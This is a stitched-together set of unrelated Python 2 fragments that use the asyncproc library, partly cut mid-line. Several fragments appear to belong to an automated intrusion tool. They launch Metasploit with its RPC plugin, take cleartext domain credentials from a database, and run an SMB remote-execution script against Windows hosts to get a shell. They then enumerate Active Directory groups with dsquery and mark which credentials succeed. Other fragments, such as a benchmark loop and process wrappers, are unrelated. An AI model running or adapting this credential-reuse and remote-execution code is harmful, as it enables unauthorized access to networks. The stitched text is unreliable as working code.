def startMetasploit(self, username, password, port): print "starting metasploit ..." gotConsole = False rpcStarted = False rpcRunning = False self.metasploitProcess = asyncproc.Process( "msfconsole -m software/metasploit/modules/".split()) startTime = time.time() while not rpcRunning: if time.time() - startTime >= 60: print "timeout.will try again" break poll = self.metasploitProcess.wait(os.WNOHANG) if poll is not None: # break time.sleep(1) out = self.metasploitProcess.read() gotConsole = False if out != "": # print out.strip() # if repr(out) == repr("\x1b[4mmsf\x1b[0m \x1b[0m> "): if repr(out).find(repr("\x1b[4mmsf\x1b[0m \x1b[0m> ")) != -1: gotConsole = True if rpcStarted is True: if out.find("Successfully loaded plugin: msgrpc") != -1: rpcRunning = True if gotConsole is True: if rpcStarted is False: time.sleep(1) self.metasploitProcess.write( "load msgrpc User={0} Pass={1} ServerPort={2}\n". format(username, password, port)) rpcStarted = True if rpcRunning is True: print "metasploit running on 127.0.0.1:{0} with creds {1}:{2}".format( port, username, password) else: print "there was a error starting the metasploit console" try: self.metasploitProcess.kill(0) except: pass
def GetProcess(params, domain, username, password, host): proc = None #try: if True: proc = asyncproc.Process([ "./software/adsmbexec.py", "{}/{}:{}@{}".format(domain, username, password, host) ]) params.log("./software/adsmbexec.py {}/{}:{}@{}".format( domain, username, password, host)) runWithDifferentUser = False gotShell = False startTime = time.time() while True: poll = proc.wait(os.WNOHANG) out = proc.read() time.sleep(0.25) if time.time() - startTime >= 60: #print "too much time has passed. quitting" #log = log + "too much time has passed. quitting" + "\r\n" #params.log("too much time has passed. quitting") break if out != "": print out if out.find("Windows") > -1: gotShell = True break elif out.find("SMB SessionError") > -1: proc = None break elif out.find("The target principal name is incorrect") > -1: runWithDifferentUser = True elif out.find( "'dsquery' is not recognized as an internal or external command" ) > -1: runWithDifferentUser = True return proc
def __init__(self, cmd, env=None): self.process = asyncproc.Process(cmd, stderr=file("/dev/null", "w"), env=env or {}) self._read_buffer = ""
'--args', dest='args', help='Command line arguments to pass to --executable') parser.add_option('-n', '--num_trials', type='int', default=10000, dest='num_trials', help='The number of iterations to run') (options, args) = parser.parse_args() process_args = [ options.executable, ] process_args.extend(options.args.split(' ')) process = asyncproc.Process(process_args) line = '' while not line.strip() == 'READY': line = process.read() line = '' start = datetime.datetime.now() for i in xrange(options.num_trials): process.write('GO\n') found_ready = False while not found_ready: data = process.read() # Note: This isn't very robust. If a read returns part of the READY # token (e.g. REA) we don't buffer it and won't notice when the rest of # the token appears next time.
def run(params): sql = """ select d.id, hd.ip_address, dc.domain, dc.username, dc.cleartext_password, m.id from domains d join domain_credentials dc on d.domain_name = dc.domain join domain_credentials_map m on m.domain_credentials_id = dc.id join host_data hd on m.host_data_id = hd.id where d.footprint_id = dc.footprint_id and d.footprint_id = hd.footprint_id and d.footprint_id = m.footprint_id and m.valid = true and d.info_gathered = false and m.psexec_failed = false and m.dgu_failed = false and d.id not in (select item_identifier from task_list where task_descriptions_id = 20 and footprint_id = %s and in_progress = true) and hd.footprint_id = %s order by username limit 1 """ cursor = params.db.cursor() cursor.execute(sql, (params.footprint_id, params.footprint_id, )) row = cursor.fetchone() cursor.close() if row != None: cursor = params.db.cursor() cursor.execute("select addTaskListItem(%s, 20, %s, true, false)", (params.footprint_id, row[0], )) task_id = cursor.fetchone()[0] cursor.close() log = "" cmd = "./software/adsmbexec.py {}/{}:{}@{}".format(row[2],row[3],row[4],row[1]) params.log(cmd) proc = asyncproc.Process(["./software/adsmbexec.py", "{}/{}:{}@{}".format(row[2],row[3],row[4],row[1])]) runWithDifferentUser = False gotShell = False startTime = time.time() while True: poll = proc.wait(os.WNOHANG) out = proc.read() time.sleep(0.25) if time.time() - startTime >= 60: #print "too much time has passed. quitting" log = log + "too much time has passed. quitting" + "\r\n" params.log("too much time has passed. quitting") break if out != "": #print out log = log + out + "\r\n" params.log(out) if out.upper().find("Windows".upper()) > -1: gotShell = True break elif out.upper().find("STATUS_SHARING_VIOLATION".upper()) > -1: proc = None runWithDifferentUser = True break elif out.upper().find("SMB SessionError".upper()) > -1: proc = None runWithDifferentUser = True break elif out.upper().find("rpc_x_bad_stub_data".upper()) > -1: proc = None runWithDifferentUser = True break elif out.upper().find("Unexpected answer from server".upper()) > -1: proc = None runWithDifferentUser = True break elif out.upper().find("The target principal name is incorrect".upper()) > -1: runWithDifferentUser = True # TODO update this host, set psexec_failed = true elif out.upper().find("'dsquery' is not recognized as an internal or external command".upper()) > -1: runWithDifferentUser = True if runWithDifferentUser: cursor = params.db.cursor() cursor.execute("update domain_credentials_map set dgu_failed = true where id = %s", (row[5], )) cursor.close() if gotShell: out = runCmd(proc, "dsquery group -limit 0") #for l in runCmd(proc, "dsquery group -limit 0").split("\n"): for l in out.split("\n"): #group = l.split(",")[0].split("=")[1], #print l log = log + l + "\r\n" params.log(l) if l.find("'dsquery' is not recognized as an internal or external command") != -1: runWithDifferentUser = True break if l != "": if l.split(",")[0].split("=")[1].find("{") == -1: #print "group [{}]".format(l.split(",")[0].split("=")[1],) cursor = params.db.cursor() cursor.execute("select addDomainGroup(%s, %s, %s)", (params.footprint_id, row[0], l.split(",")[0].split("=")[1], )) cursor.close() else: break time.sleep(0.5) proc.write("exit\n") time.sleep(2) if runWithDifferentUser == True: cursor = params.db.cursor() cursor.execute("update domain_credentials_map set dgu_failed = true where id = %s", (row[5], )) cursor.close() #print "output [{}]".format(out) if out is not "": if not runWithDifferentUser: spCursor = params.db.cursor() spCursor.execute("update domains set info_gathered = true where id = %s", (row[0], )) spCursor.close() final_output = "" while params.log_queue.empty() == False: final_output += "{0}\r\n".format(params.log_queue.get(False)) final_output = final_output[:-2] spCursor = params.db.cursor() spCursor.execute("select updateTaskStatus(%s, %s, %s, %s)", ( task_id, False, True, base64.b64encode(final_output), )) spCursor.close()
def __call__(self, *args, **kwargs): #p = subprocess.Popen([self.execPath] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) p = asyncproc.Process([self.execPath] + list(args)) return Pipes(i=p.stdin, out=p.stdout, err=p.stderr)
def GetProcess(params, domain, username, password, host, map_id): proc = None #try: if True: proc = asyncproc.Process([ "./software/adsmbexec.py", "{}/{}:{}@{}".format(domain, username, password, host) ]) runWithDifferentUser = False gotShell = False startTime = time.time() while True: poll = proc.wait(os.WNOHANG) out = proc.read() time.sleep(0.25) if time.time() - startTime >= 60: #print "too much time has passed. quitting" #log = log + "too much time has passed. quitting" + "\r\n" #params.log("too much time has passed. quitting") break if out != "": print out if out.upper().find("Windows".upper()) > -1: gotShell = True break elif out.upper().find("STATUS_SHARING_VIOLATION".upper()) > -1: proc = None runWithDifferentUser = True break elif out.upper().find("SMB SessionError".upper()) > -1: proc = None runWithDifferentUser = True break elif out.upper().find("rpc_x_bad_stub_data".upper()) > -1: proc = None runWithDifferentUser = True break elif out.upper().find( "Unexpected answer from server".upper()) > -1: proc = None runWithDifferentUser = True break elif out.upper().find( "The target principal name is incorrect".upper()) > -1: runWithDifferentUser = True # TODO update this host, set psexec_failed = true elif out.upper( ).find("'dsquery' is not recognized as an internal or external command" .upper()) > -1: runWithDifferentUser = True if runWithDifferentUser: cursor = params.db.cursor() cursor.execute( "update domain_credentials_map set dgu_failed = true where id = %s", (map_id, )) cursor.close() return proc